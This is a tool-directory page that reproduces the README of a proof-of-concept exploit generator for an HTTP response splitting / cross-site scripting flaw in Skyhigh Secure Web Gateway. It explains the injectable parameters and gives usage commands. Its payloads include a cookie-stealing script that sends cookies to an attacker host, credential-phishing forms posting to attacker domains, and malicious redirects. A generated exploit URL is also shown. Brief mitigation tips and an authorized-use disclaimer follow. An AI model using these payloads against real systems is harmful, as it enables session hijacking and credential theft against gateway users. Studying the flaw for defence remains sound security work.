Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-0214 — Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) | Kitploit
Tools/GitHubGitHub/0pts/cve-2023-0214
Phishing ToolsVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHub0pts/cve-2023-0214

CVE-2023-0214

Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)

View Repository
2148 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

SWG Exploit Generator

██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

by 0PTS

Proof of Concept for the HTTP Response Splitting vulnerability in Skyhigh Secure Web Gateway (formerly McAfee Web Gateway).

About the Vulnerability

Critical HTTP Response Splitting vulnerability in Skyhigh Secure Web Gateway, allowing remote execution of XSS attacks through arbitrary HTML/JavaScript code injection.

Technical Details

  • Type: HTTP Response Splitting / Cross-Site Scripting (XSS)
  • Severity: High
  • Attack Vector: Remote, no authentication required

Exploit Operation Principle

The vulnerability resides in the "Ssos" plugin (action SetLoginToken), which incorrectly handles URL parameters:

  1. Parameter "p" → injected into the P3P header
  2. Parameter "c" → injected into the response body
  3. Parameter "v" → injected into the MwgSso cookie

Since newline characters (\r\n / %0d%0a) are not sanitized, an attacker can:

  • Inject arbitrary HTTP headers
  • Override Content-Type and Content-Length
  • Inject arbitrary HTML/JavaScript code

The browser ignores the rest of the response after a properly formed Content-Length, allowing full content spoofing.

Usage

Basic Run

python explot.py

With parameters (like nmap)

# Basic XSS
python explot.py -d example.com -p "<script>alert(document.domain)</script>"

# Redirect
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'

# Phishing form
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'

# URL only (quiet mode)
python explot.py -d example.com -p "<script>alert(1)</script>" -q

Parameters

-d, --domain    Target domain (default: google.com)
-x, --prefix    URL path prefix (default: SWG internal path)
-p, --payload   HTML/JavaScript payload
-q, --quiet     Quiet mode - URL only
-v, --version   Script version
-h, --help      Help

Payload Examples

XSS with cookie theft

<script>fetch('https://attacker.com/log?c='+document.cookie)</script>

Phishing form

<html>
<body style="font-family:Arial">
<h2>Session Expired - Please Login Again</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Username"><br>
<input type="password" name="pass" placeholder="Password"><br>
<button>Login</button>
</form>
</body>
</html>

Redirect to malicious site

<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">

Demonstration

██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

[+] Target Domain:   example.com
[+] Payload Length:  43 bytes
[+] URL Length:      234 chars

[+] Generated URL:

http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Protection

  1. Update Skyhigh SWG to the latest version
  2. Use WAF with CRLF injection filtering
  3. Monitor suspicious requests to /mwg-internal/*

Disclaimer

⚠️ WARNING: This tool is intended solely for:

  • Authorized penetration testing
  • Educational purposes
  • CTF competitions
  • Security research

Using it against systems without explicit owner permission is illegal.

Sources

  • https://www.exploit-db.com/exploits/51237
  • Skyhigh Security Bulletins

██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝
Download Tool